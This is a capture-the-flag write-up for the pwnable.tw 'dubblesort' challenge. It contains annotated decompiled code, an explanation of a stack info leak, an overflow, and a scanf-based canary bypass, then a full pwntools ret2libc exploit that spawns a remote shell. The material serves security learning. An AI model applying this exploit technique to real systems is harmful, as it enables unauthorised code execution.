Challenge
Vulnerability
A strange character appeared in the output, so I should check for a leak.
It seems to really sort the numbers I entered.
int __cdecl main(int argc, const char **argv, const char **envp)
{
/* IDA decompiler output of the challenge binary, kept verbatim because the
 * writeup refers to it. The comments mark the behaviour the writeup relies
 * on and what a hardened version would have to do differently. */
int num_cnt; // eax
unsigned int *ptr_arr; // edi
unsigned int cnt; // esi
unsigned int index; // esi
int result; // eax
int v8; // [esp+8h] [ebp-84h]  -- never assigned here; passed to the first printf as an extra vararg (decompiler artifact, presumably)
unsigned int input_cnt; // [esp+18h] [ebp-74h]  -- user-chosen element count, never compared against the size of arr
unsigned int arr[8]; // [esp+1Ch] [ebp-70h]  -- only 8 slots
char buf[64]; // [esp+3Ch] [ebp-50h]  -- name buffer; never zeroed, never NUL-terminated
unsigned int v12; // [esp+7Ch] [ebp-10h]  -- saved copy of the stack-protector canary
/* Stack protector prologue: keep a copy of the TLS canary for the check at the end. */
v12 = __readgsdword(0x14u);
sub_8B5(); /* setup helper; its body is not part of this listing */
__printf_chk(1, "What your name :", v8);
/* read() stores at most 0x40 bytes and adds no terminator, so the bytes after
 * the name keep whatever was on the stack before (and the whole 64 bytes can be
 * filled). Fix: read at most sizeof(buf) - 1 bytes and NUL-terminate. */
read(0, buf, 0x40u);
/* Info leak: %s prints until the first zero byte, i.e. past the name and into
 * stale stack contents (the writeup recovers a libc address this way).
 * Fix: terminate buf, or print with a bounded precision such as "%.64s". */
__printf_chk(1, "Hello %s,How many numbers do you what to sort :", buf);
/* Return value unchecked: on a conversion failure input_cnt is left as is. */
__isoc99_scanf("%u", &input_cnt);
num_cnt = input_cnt;
if ( input_cnt )
{
ptr_arr = arr;
cnt = 0;
/* Stack buffer overflow: the loop stores input_cnt dwords starting at arr,
 * but arr holds only 8. Larger counts write upward through buf, the canary
 * copy at ebp-10h and, per the writeup, the return address.
 * Fix: reject input_cnt > 8 (sizeof arr / sizeof arr[0]) before this loop. */
do
{
__printf_chk(1, "Enter the %d number : ", cnt);
fflush(stdout);
/* Unchecked scanf again: a non-numeric token fails the %u conversion and the
 * target slot is simply not written (the writeup's "skip the canary" trick).
 * Fix: require a return value of 1 and abort the loop otherwise. */
__isoc99_scanf("%u", ptr_arr);
++cnt;
num_cnt = input_cnt;
++ptr_arr;
}
while ( input_cnt > cnt );
}
/* Sorts the first num_cnt dwords of arr in place (bubble sort, per the writeup);
 * with an oversized count it also reorders the overflowed stack slots. */
SUB_processing(arr, num_cnt);
puts("Result :");
if ( input_cnt )
{
index = 0;
/* Same unbounded count on the read side: prints past arr for input_cnt > 8. */
do
__printf_chk(1, "%u ", arr[index++]);
while ( input_cnt > index );
}
result = 0;
/* Stack protector epilogue: the saved canary must still match the TLS value;
 * SUB_exit is presumably the __stack_chk_fail stub. Only an intact canary
 * reaches the return. */
if ( __readgsdword(0x14u) != v12 )
SUB_exit();
return result;
}
I can leak a value from the stack thanks to printf("%s")!! (at line no. 18)
But I can't leak the canary because buf's length is 0x40.
What I can leak is libc address. (checked using gdb)
Then it reads some values and stores them on the stack.
The point is that there is no limit on how many numbers can be entered.
we can overwrite the return address!
But.. what about the canary?
Um.... after some time of worrying I found out that if I enter a non-numeric value for scanf("%u"), nothing is written to the stack!
Okay, then we can leave the canary at its original value.
Processing function performs bubble sort of entered values.
What I have to do is just write the address of the 'system' function and the string '/bin/sh' at the appropriate positions on the stack, and the important thing is to make sure they are not reordered by the sorting process!
FL4G
#!/usr/bin/env python
# pwnable.tw dubblesort
from pwn import *
debug = 0
def leak(offset):
    """Read one 32-bit stack value through the unterminated name buffer.

    The binary read()s the name into an uninitialised buffer without adding a
    NUL and echoes it back with ``%s``, so a name of exactly ``offset * 4``
    bytes makes the echo continue into whatever bytes follow the name on the
    stack. ``offset`` counts dwords. Returns the 4 bytes after the echoed
    padding as an int (pwntools ``u32``). Uses the module-level tube ``s``.
    """
    s.recvuntil('name :')
    # Padding is sent with send(), not sendline(): a newline would terminate
    # nothing here but would shift the echoed bytes by one.
    s.send('a' * offset * 4)
    # Consume our own echoed padding; the next 4 bytes are the leaked dword.
    s.recvuntil('Hello '+'a' * offset*4)
    re = u32(s.recv(4))  # note: 're' here is just the raw value, not the regex module
    if debug:
        log.info('raw leak : '+hex(re))
    return re
def send_num(num):
    """Answer one "Enter the N number :" prompt with ``num`` (a string).

    A non-numeric string makes the binary's unchecked scanf("%u") fail, which
    leaves that array slot unwritten; exploit() uses this to step over the
    canary. Uses the module-level tube ``s``.
    """
    s.recvuntil('number : ')
    s.sendline(num)
def exploit():
    """Drive one session: leak libc, then overflow the number array.

    The stack layout is the writeup's: 24 dwords lie between arr[0] and the
    canary copy, the canary slot is skipped with a non-numeric entry, and the
    values written after it must survive the binary's bubble sort (small
    padding values first, then addresses in ascending order).
    """
    # Leak the 7th dword after the start of the name buffer and rebase libc
    # from it. The subtracted constant is the offset of that leaked value
    # inside the remote libc (found with gdb per the writeup) and is specific
    # to that libc build.
    libc_base = leak(7) - 0x1ae244
    if debug:
        log.info('libc base : '+hex(libc_base))
    # Offsets of system() and the "/bin/sh" string: the debug pair belongs to
    # the local libc, the other pair to the remote one.
    if debug:
        binsh_offset = 0x15ba0b
        system_offset = 0x3ada0
    else:
        binsh_offset = 0x158e8b
        system_offset = 0x3a940
    system = libc_base + system_offset
    binsh = libc_base + binsh_offset
    s.recvuntil('sort :')
    # Element count: 24 padding + 1 skipped canary slot + 8 + 2 = 35, far
    # beyond the 8-element array the binary actually has.
    s.sendline('35')
    for i in range(24):
        send_num('1')
    send_num('+') # canary
    for i in range(8):
        send_num(str(system))
    send_num(str(binsh))
    send_num(str(binsh))
if __name__ == '__main__':
    # 's' is the tube read by leak()/send_num()/exploit() as a module global.
    if debug:
        # Local run against the bundled libc (see the LD_LIBRARY_PATH note);
        # pause() waits so a debugger can be attached before any input is sent.
        #export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:~/pwnable_tw/dubblesort/libc
        s = process('./dubblesort')
        pause()
    else:
        s = remote('chall.pwnable.tw', 10101)
    exploit()
    # Hand the remaining session over to the terminal, then close the tube.
    s.interactive()
    s.close()